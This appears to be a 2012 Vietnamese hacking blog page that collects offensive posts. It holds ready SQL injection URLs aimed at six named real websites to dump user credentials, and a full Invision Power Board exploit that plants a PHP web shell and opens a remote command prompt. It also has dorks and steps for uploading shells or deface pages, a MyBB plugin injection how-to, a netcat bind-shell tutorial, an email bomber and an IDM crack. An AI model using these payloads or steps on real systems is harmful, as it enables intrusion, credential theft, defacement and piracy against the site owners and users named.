1 thg 12, 2012

no image

6 Random Injections


1/

Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,​0x3b,password),5,6,7,8,9,10 from users_tbl--



2/

Mã:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1​9,20,21,22,23 from user_table--

3/

Mã:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Mã:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b,​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Mã:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Mã:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--
no image

[TUT] SQL dạng HTML


Link Download
http://www.mediafire.com/?6hh2ykae8xpuq2q

Hoặc
https://www.box.com/s/3m0xluf10xdhcdw95qzu

kakavn
no image

Top Site trong nước dính SQL Check 23/11/2012


no image

WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting


no image

Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution


<?php /* ---------------------------------------------------------------- Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution ---------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......:


http://www.invisionpower.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php 4015. static public function get($name) 4016. { 4017. // Check internal data first 4018. if ( isset( self::$_cookiesSet[ $name ] ) ) 4019. { 4020. return self::$_cookiesSet[ $name ]; 4021. } 4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) ) 4023. { 4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ]; 4025. 4026. if ( substr( $_value, 0, 2 ) == 'a:' ) 4027. { 4028. return unserialize( stripslashes( urldecode( $_value ) ) ); 4029. } The vulnerability is caused due to this method unserialize user input passed through cookies without a proper sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this reason successful exploitation of this vulnerability requires short_open_tag to be enabled. [-] Disclosure timeline: [21/10/2012] - Vulnerability discovered [23/10/2012] - Vendor notified [25/10/2012] - Patch released: http://community.invisionpower.com/t...ecurity-update [25/10/2012] - CVE number requested [29/10/2012] - Assigned CVE-2012-5692 [31/10/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set('default_socket_timeout', 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------------------+"; print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |"; print "\n+---------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /ipb/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $packet = "GET {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : ''; class db_driver_mysql { public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php'); } $payload = urlencode(serialize(array(new db_driver_mysql))); $phpcode = '<?error_reporting(0);print(___);passthru(base64_d ecode($_SERVER[HTTP_CMD]));die;?>'; $packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n"); while(1) { print "\nipb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }

no image

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

Bug cho forum sài MyBB với cái Albums plugin version 0.9
Tut: 
1. Tạo cái user trên forum victim.
2. Tạo cái Album rồi upload hình lên.
-> 2 bước trên để có được cái ID user và ID của album sử dụng cho bước thứ 3.


3. Điền ID user vào cái Valid_ID và điền cái ID của album vào cái Valid_album_ID rồi thêm lệnh SQL khai thác ở cuối.
link: .../albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]
# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within albums.php :

input['album'];
/*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'");
?>

/albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Image : http://i.imgur.com/yeAx0.png


Follow: https://twitter.com/PonyBlaze


Nguồn: http://junookyo.blogspot.com/2012/11/mybb-profile-albums-plugin-09-albumsphp.html
Puzzles to Test your Hacking Skills

Puzzles to Test your Hacking Skills


Hello Friends,
Many readers of my site want to be a hacker.... and till then of course you have learnt many things.... So now its time to check your hacking Skills.

Here i am providing you link of some sites where you can test your hacking skills just by solving Puzzles.. Its really very interesting and i am sure by solving these puzzles you will get some more knowledge also. In these sites, the Puzzles are arranges in many levels from easy to hard, So how much you are a gud hacker, depends on how many levels you do clear.

So I m telling here link of 4 Top sites. Try it, these are Fun and Challenging :) And share your Results and Experience here :)

  1. http://www.try2hack.nl/
  2. http://www.hack-test.com/index.htm
  3. http://www.elfqrin.com/hack/hackertest.html
  4. http://www.hackthissite.org/

no image

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"


Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option

Now select your shell or deface page and upload it

To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0

Nguồn: http://junookyo.blogspot.com/2012/12/testing-image-collection-shell-and.html
Email Bomber aka Mass Mailer

Email Bomber aka Mass Mailer


Email Bomber aka Mass Mailer | Juno_okyo's Blog

http://pastebin.com/qegBLu97 
CK Hash Cracker

CK Hash Cracker


CK Hash Cracker | Juno_okyo's Blog

CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here

__Change Log__
Hash Identifier Modified



Online Database Checker Bug Fixed And Works Faster
Offline Database Search Engine Modified
Rainbow Table Algorithm Added

How To Add Additional Database Release?

After Installation with the Default Settings, A Folder Named CK_Hash_Cracker Verion 3.0 will be Created in Root Directory/Program Files, which is mostly C: Drive, So that path will Be C:\Program Files\CK_Hash_Cracker-Version 3.0; under This Folder There Are Two Folders Named "Brute" And "DatabaseConnector"

Files Under "Brute" Folder Is Used For BruteForcing, Make Sure If You Place Additional WordList, You Do Not Have Duplicate Words, Otherwise It will just increase the Time. You Can Place Files With Any Name Under This Folder, It Will Work Fine, until the Files Are in Readable Format

Files Under "DatabaseConnector" Are The Offline Database, So For Any Database Releases, After Downloading Databases, Put The Files Under "DatabaseConnector" Folder And Thats It, The Tool Will Automatically Upgrade The Database.

Its Has A Self-Installer, So To Install, Just Run The Setup file. To Uninstall, You Can Remove It From Control Panel Or From The Self Uninstaller.

If You Get Error At Run-Time, Probably You Do Not Have The Microsoft Visual C++ 2008 Installed, The Application doesn't need Python To Run, But It Needs The Run-Time Components. You Get The Download Packages From Here:

For Windows 32 bit: Click Here

For Windows 64 bit: Click Here

And Then Try Running The Application.
CK_Hash_Cracker (Version 3.0) Download Link: Click Here

Nguồn: http://junookyo.blogspot.com/2012/12/ck-hash-cracker.html
no image

Tutorial: How Crack IDM

Link download:
https://www.box.com/shared/codrpymlce
Tutorial by Lovepascal (2007).
Bug script WordPress SQL Injection version 3.1.3

Bug script WordPress SQL Injection version 3.1.3

Exploits links here

no image

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

[IMG]
3.set chmod 777 for nc



[IMG]
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command 
nc -vv [ip target] [port]




[IMG]

6.now you have back connect it

[IMG]
[Video TUT] Remote Code Execution vbullentin 4.1.10 Exploit

[Video TUT] Remote Code Execution vbullentin 4.1.10 Exploit


Greetings:Pirjo(iranian black hat hacker),Team openfire,Team INTRA,team injectors and all hackers